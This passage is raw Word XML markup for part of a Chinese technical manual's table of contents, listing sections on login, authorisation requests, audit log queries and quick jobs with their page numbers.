            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166255" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.10 登录请求</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166255 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>328</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F7147F7" w14:textId="38AFFA2B" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166256" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.11 新建授权请求</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166256 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>329</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67E2B9BA" w14:textId="55416BDA" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166257" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.12 更新授权结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166257 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>330</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FFBFD17" w14:textId="1BC1DE19" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166258" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.13 删除授权请求</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166258 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>332</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01296A79" w14:textId="61496B07" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166259" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.14 查询授权请求</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166259 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>333</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CE65509" w14:textId="36A02BC3" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166260" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.15 批量新建任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166260 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>337</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B591323" w14:textId="4DF22648" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166261" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7 系统审计日志查询</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166261 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>339</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="433FF507" w14:textId="3C0D8C31" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166262" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8 快速任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166262 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>342</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07A7DE6F" w14:textId="1245B20E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166263" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1 获取快速任务检测项列表</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166263 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>342</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E0CEBB1" w14:textId="40AA127C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166264" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2 获取某一个任务的详细信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166264 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>344</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60BAB4F3" w14:textId="4B00B0E0" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166265" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3 创建一个快速作业</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166265 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>347</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75BCAB56" w14:textId="432750C0" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166266" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4 编辑作业</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166266 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>349</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6205F302" w14:textId="03303D9B" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166267" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5 删除作业</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166267 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>351</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19487BCE" w14:textId="7CFD4B22" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166268" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6 获取作业列表</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166268 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>351</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CC24CC7" w14:textId="309D72DE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166269" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7 立即执行某个作业</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166269 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>354</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="150837F3" w14:textId="7E5DA50C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166270" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.8 查看作业执行列表</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166270 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>355</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
